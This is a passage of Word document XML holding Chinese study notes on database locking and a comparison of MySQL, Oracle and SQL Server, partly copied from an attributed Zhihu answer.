          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>悲观锁:开销大，避免长事务</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>表锁、行锁/读锁、写锁</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>乐观锁:开销小，读大于写</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Version版本号机制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>数据库辅助工具：Power Designer、EZDML、ER Studio、Rose、Microsoft Visio...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>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关系型数据库</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>先来看看它们三个的流行趋势</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2767965"/>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C:\Users\Administrator\Desktop\v2-65fa9ab78cf17c7b1eaf6e07bc4b7755_hd.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2768012"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1845945"/>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C:\Users\Administrator\Desktop\v2-2b7358add406a18c4dab5af37ca09250_hd.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1845960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:t>作者：实验楼在线教育</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>链接：https://www.zhihu.com/question/19866767/answer/426919833</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>来源：知乎</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://link.zhihu.com/?target=https%3A//www.mysql.com/" \t "_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://link.zhihu.com/?target=https%3A//www.oracle.com/cn/database/index.html" \t "_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Oracle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>一种使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:t>语言并由Oracle维护的数据库软件。</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://link.zhihu.com/?target=https%3A//www.microsoft.com/en-us/sql-server/" \t "_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Microsoft SQL Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>也是一种使用SQL语言并由Microsoft维护的数据库工具。Oracle最早发行，紧接着是SQL Server和MySQL。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
      </w:pPr>
      <w:r>
        <w:t>作为广泛使用的</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://link.zhihu.com/?target=https%3A//www.baidu.com/link%3Furl%3DZgHdJI8HZIDrabMKbg6xKUGi_qlSrFPiAxe3rLoUbcBLxfNrC9OSD8s97oCvE9BVM-GvjkigRlzYgAMkptNos_%26wd%3D%26eqid%3D88a2f6ed0000b45f000000055b31d1ca" \t "_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:t>关系数据库管理系统（RDBMS）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>，它们有一些相同的地方，比如辅助数据库模型都包含了文档储存和键值储存。但也存在很大差别。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>服务器操作系统</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
      </w:pPr>
      <w:r>
        <w:t>SQL Server：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
      </w:pPr>
      <w:r>
        <w:t>MySQL：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>FreeBSD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>OS X</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Solaris</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
      </w:pPr>
      <w:r>
        <w:t>Oracle：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>AIX</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>HP-UX</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>OS X</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Solaris</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>z / OS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>支持的编程语言</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>SQL Server：C＃、C ++、Delphi、Go、Java、JavaScript（Node.js）、PHP、Python、R、Ruby、Visual Basic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>MySQL：Ada、C、C＃、C ++、D、Delphi、Eiffel、Erlang、Haskell、Java、JavaScript（Node.js）、Objective-C、OCaml、Perl、PHP、Python、Ruby、Scheme、Tcl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Oracle：C、C＃、C ++、Clojure、Cobol、Delphi、Eiffel、Erlang、Fortran、Groovy、Haskell、Java、JavaScript、Lisp、Objective C、OCaml、Perl、PHP、Python、R、Ruby、Scala、Tcl、Visual Basic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>服务器端脚本</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>SQL Server：Transact SQL和.NET语言</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>MySQL：专有语法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Oracle：PL / SQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>不同节点存储数据的方法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>SQL Server：表可以分布在多个文件中（水平分区）;通过联合进行分片</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>MySQL：水平分区，使用MySQL Cluster或MySQL Fabric进行分片</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Oracle：水平分区</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>数据库</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Oracle：最贵，功能最多，安装最不方便，Oracle环境里的其他相关组件最多，支持平台数量一般，使用中等方便，开发中等方便，运维中等方便，不开源，速度最慢，最安全。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Microsoft SQL Server 2014：中等贵，功能最少，安装中等方便，Microsoft SQL Server 2014环境里的其他相关组件最少，支持平台最少，使用最方便，开发最方便，运维最方便，不开源，速度中等，一般安全。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Mysql：免费，功能中等，安装最方便，Mysql环境里的其他相关组件数量中等，支持平台最多，使用最不方便，开发最不方便，运维最不方便，有开源版本，速度最快，最不安全。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Oracle的客户端和命令窗口，都是由用户决定内容 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="22"/>
        </w:rPr>
        <w:t>conn user_name/password;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MySQL的客户端和命令窗口，都是由数据库决定内容 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="22"/>
        </w:rPr>
        <w:t>use datebase;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Oracle和MSSQL的纯RDBMS层主要提供比MySQL和InnoDB更成熟的可编程环境。MySQL存储过程和触发器还不能匹配T-SQL和PL / SQL。在MySQL（RDBMS层）的MSSQL（报告服务，分析服务）和Oracle（数据仓库，RAC）之上有大量的集成工具和服务，MySQL尚未具备这些工具和服务。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>总结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Oracle处理效能最快，而就以每秒交易量与价格比较的话，SQL Server最有效益，而MySQL也有不错的表现。Oracle传统，跨平台，稳定，适合OLTP，最接近数据库设计范式，一致性处理是最好的，也是最复杂的。适合金融，电信等企业。要想用好并发挥其性能，对管理员的能力要求较高。另维护成本较高。SQL Server目前只能在Windows系列执行，限制其发展。但在Unix与Linux都有非常高的稳定度与效能。MySql适合开发者，简单。不过随着Oracle的入主，功能越来越完善，又因为其开源，阿里开发了改进大数据库，性能和应用场景不断拓宽，形势大好。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="43"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL在Windows，Linux，MaxOS平台的安装</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装MySQL驱动，能被C#调用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Navicat </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="46"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312"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noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6637655" cy="3905885"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
